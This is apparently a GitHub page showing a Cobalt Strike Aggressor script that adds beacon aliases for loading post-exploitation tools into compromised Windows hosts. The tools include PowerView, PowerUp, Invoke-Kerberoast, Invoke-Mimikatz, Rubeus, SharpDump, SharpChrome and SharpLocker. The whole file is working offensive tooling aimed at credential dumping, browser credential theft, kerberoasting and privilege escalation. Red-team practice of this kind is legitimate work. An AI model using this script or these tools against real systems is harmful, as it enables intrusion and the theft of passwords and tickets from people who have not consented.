-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathload_arsenal.cna
121 lines (102 loc) · 2.8 KB
/
load_arsenal.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
#### Load PowerShells
## Aggressor script to simplify importing powershell scripts using powershll-import
### Author: Sabri (@KINGSABRI)
### Usage ###
# 1. Modify/Add your script pathes in global variable section
# 2. Import into Cobalt Strike
# 3. From beacon try
# beacon> load_powerview
# beacon> load_powerup
# beacon> load_powerupsql
# beacon> whoami
### Output ###
# powershell-import task gets exected
# execute-assembly tas gets executed
### Global variables section
$powerview_path = "/rt/p/rt-powershell/PowerView.ps1";
$powerup_path = "/rt/p/rt-powershell/PowerUp.ps1";
$powerupsql_path = "/rt/p/rt-powershell/PowerUpSQL/PowerUpSQL.ps1";
$kerberoast_path = "/rt/p/rt-powershell/Invoke-Kerberoast.ps1";
$mimikatz_path = "/rt/p/rt-powershell/Invoke-Mimikatz.ps1";
$whoami_path = "/rt/p/rt-compiled/SharpSploit/whoami.exe";
$rubeus_path = "/rt/p/rt-compiled/GhostPack/Rubeus.exe";
$seatbelt_path = "/rt/p/rt-compiled/GhostPack/Seatbelt.exe";
$sharpUp_path = "/rt/p/rt-compiled/GhostPack/SharpUp.exe";
$sharpWMI_path = "/rt/p/rt-compiled/GhostPack/SharpWMI.exe";
$sharpDump_path = "/rt/p/rt-compiled/GhostPack/SharpDump.exe";
$sharpChrome_path = "/rt/p/rt-compiled/GhostPac/SharpChrome.exe";
$sharpLocker_path = "/rt/p/rt-compiled/Misc/SharpLocker.exe";
###
sub load_ps_script
{
$bid = $1[0];
$file = $1[1];
binput($bid, "powershell_import $file");
bpowershell_import($bid, $file);
}
sub load_bin_script
{
$bid = $1[0];
$file = $1[1];
$params = join(' ', sublist($1, 3));
binput($bid, "execute-assembly $file $params");
bexecute_assembly($bid, $file, $params);
}
#
# PowerShells
#
alias load_powerview {
@args = @($1, $powerview_path);
load_ps_script(@args);
}
alias load_powerup {
@args = @($1, $powerup_path);
load_ps_script(@args);
}
alias load_powerupsql {
@args = @($1, $powerupsql_path);
load_ps_script(@args);
}
alias load_kerberoast {
@args = @($1, $kerberoast_path);
load_ps_script(@args);
}
alias load_mimikatz {
@args = @($1, $mimikatz_path);
load_ps_script(@args);
}
#
# Binaries
#
alias whoami {
@args = @($1, $whoami_path);
load_bin_script(@args);
}
alias exec_rubeus {
@args = @($1, $rubeus_path, @_);
load_bin_script(flatten(@args));
}
alias exec_seatbelt {
@args = @($1, $seatbelt_path, @_);
load_bin_script(@args);
}
alias exec_sharpUp {
@args = @($1, $sharpUp_path, @_);
load_bin_script(@args);
}
alias exec_sharpWMI {
@args = @($1, $sharpWMI_path, @_);
load_bin_script(@args);
}
alias exec_sharpDump {
@args = @($1, $sharpDump_path, @_);
load_bin_script(@args);
}
alias exec_sharpChrome {
@args = @($1, $sharpChrome_path, @_);
load_bin_script(@args);
}
alias exec_sharpLocker {
@args = @($1, $sharpLocker_path, @_);
load_bin_script(@args);
}